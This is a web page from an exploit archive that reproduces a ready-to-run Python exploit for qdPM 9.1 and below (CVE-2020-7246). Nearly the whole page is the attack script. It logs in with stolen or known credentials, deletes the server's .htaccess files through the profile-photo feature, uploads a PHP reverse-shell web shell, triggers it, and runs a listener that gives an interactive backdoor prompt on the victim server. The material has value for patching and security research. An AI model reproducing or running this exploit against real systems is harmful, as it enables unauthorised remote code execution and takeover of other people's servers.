qdpm < 9.1 remote code execution

▸▸▸ Exploit & Vulnerability >>   webapps exploit & multiple vulnerability




qdpm < 9.1 remote code execution Code Code...
				
#!/usr/bin/python #------------------------------------------------------------------------------------- # Title: qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246) # Author: Tobin Shields (@TobinShields) # # Description: This is an exploit to automatically upload a PHP web shell to # the qdPM platform via the "upload a profile photo" feature. # This method also bypasses the fix put into place from a previous CVE # # Usage: In order to leverage this exploit, you must know the credentials of # at least one user. Then, you should modify the values highlighted below. # You will also need a .php web shell payload to upload. This exploit # was built and tested using the PHP script built by pentestmonkey: # https://github.com/pentestmonkey/php-reverse-shell #------------------------------------------------------------------------------------- # Imports from requests import Session from bs4 import BeautifulSoup as bs import socket from multiprocessing import Process import time # CHANGE THESE VALUES----------------------------------------------------------------- login_url = "http://[victim_domain]/path/to/qdPM/index.php/login" username = "jsmith@example.com" password = "Pa$$w0rd" payload = "/path/to/payload.php" listner_port = 1234 # This should match your PHP payload connection_delay = 2 # Increase this value if you have a slow connection and are experiencing issues # ------------------------------------------------------------------------------------ # Build the myAccout URL from the provided URL myAccount_url = login_url.replace("login", "myAccount") # PROGRAM FUNCTIONS ----------------------------------------------------------------- # Utility function for anytime a page needs to be requested and parsed via bs4 def requestAndSoupify(url): page = s.get(url) soup = bs(page.content, "html.parser") return soup # Function to log into the application, and supply the correct username/password def login(url): # Soupify the login page login_page = requestAndSoupify(url) # Grab the csrf token token = login_page.find("input", {"name": "login[_csrf_token]"})["value"] # Build the POST values login_data = { "login[email]": username, "login[password]": password, "login[_csrf_token]": token } # Send the login request s.post(login_url, login_data) # Function to get the base values for making a POST request from the myAccount page def getPOSTValues(): myAccount_soup = requestAndSoupify(myAccount_url) # Search for the 'base' POST data needed for any requests u_id = myAccount_soup.find("input", {"name": "users[id]"})["value"] token = myAccount_soup.find("input", {"name": "users[_csrf_token]"})["value"] u_name = myAccount_soup.find("input", {"name": "users[name]"})["value"] u_email = myAccount_soup.find("input", {"name": "users[email]"})["value"] # Populate the POST data object post_data = { "users[id]": u_id, "users[_csrf_token]": token, "users[name]": u_name, "users[email]": u_email, "users[culture]": "en" # Keep the language English--change this for your victim locale } return post_data # Function to remove the a file from the server by exploiting the CVE def removeFile(file_to_remove): # Get base POST data post_data = getPOSTValues() # Add the POST data to remove a file post_data["users[photo_preview]"] = file_to_remove post_data["users[remove_photo]"] = 1 # Send the POST request to the /update page s.post(myAccount_url + "/update", post_data) # Print update to user print("Removing " + file_to_remove) # Sleep to account for slow connections time.sleep(connection_delay) # Function to upload the payload to the server def uploadPayload(payload): # Get payload name from supplied URI payload_name = payload.rsplit('/', 1)[1] # Request page and get base POST files post_data = getPOSTValues() # Build correct payload POST header by dumping the contents payload_file = {"users[photo]": open(payload, 'rb')} # Send POST request with base data + file s.post(myAccount_url + "/update", post_data, files=payload_file) # Print update to user print("Uploading " + payload_name) # Sleep for slow connections time.sleep(connection_delay) # A Function to find the name of the newly uploaded payload # NOTE: We have to do this because qdPM adds a random number to the uploaded file # EX: webshell.php becomes 1584009-webshell.php def getPayloadURL(): myAccount_soup = requestAndSoupify(myAccount_url) payloadURL = myAccount_soup.find("img", {"class": "user-photo"})["src"] return payloadURL # Function to handle creating the webshell listener and issue commands to the victim def createBackdoorListener(): # Set up the listening socket on localhost server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "0.0.0.0" port = listner_port # Specified at the start of this script by user server_socket.bind((host, port)) server_socket.listen(2) victim, address = server_socket.accept() # Print update to user once the connection is made print("Received connection from: " + str(address)) # Simulate a terminal and build a pusdo-prompt using the victem IP prompt = "backdoor@" + str(address[0]) + ":~$ " # Grab the first response from the victim--this is usually OS info response = victim.recv(1024).decode('utf-8') print(response) print("\nType 'exit' at any time to close the connection") # Maintain the connection and send data back and forth while True: # Grab the command from the user command = input(prompt) # If they type "exit" then close the socket if 'exit' in command: victim.close() server_socket.close() print("Disconnecting, please wait...") break # For all other commands provided else: # Encode the command to be properly sent via the socket & send the command command = str.encode(command + "\n") victim.send(command) # Grab the response to the command and decode it response = victim.recv(1024).decode('utf-8') # For some odd reason you have to hit "enter" after sending the command to receive the output # TODO: Fix this so it works on a single send? Although it might just be the PHP webshell victim.send(str.encode("\n")) response = victim.recv(1024).decode('utf-8') # If a command returns nothing (i.e. a 'cd' command, it prints a "$" # This is a confusing output so it will omit this output if response.strip() != "$": print(response) # Trigger the PHP to run by making a page request def triggerShell(s, payloadURL): pageReq = s.get(payloadURL) # MAIN FUNCTION ---------------------------------------------------------------------- # The main function of this program establishes a unique session to issue the various POST requests with Session() as s: # Login as know user login(login_url) # Remove Files # You may need to modify this list if you suspect that there are more .htaccess files # However, the default qdPM installation just had these two files_to_remove = [".htaccess", "../.htaccess"] for f in files_to_remove: removeFile(f) # Upload payload uploadPayload(payload) # Get the payload URL payloadURL = getPayloadURL() # Start a thread to trigger the script with a web request process = Process(target=triggerShell, args=(s, payloadURL)) process.start() # Create the backdoor listener and wait for the above request to trigger createBackdoorListener()

Qdpm < 9.1 remote code execution Vulnerability / Exploit Source : Qdpm < 9.1 remote code execution



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.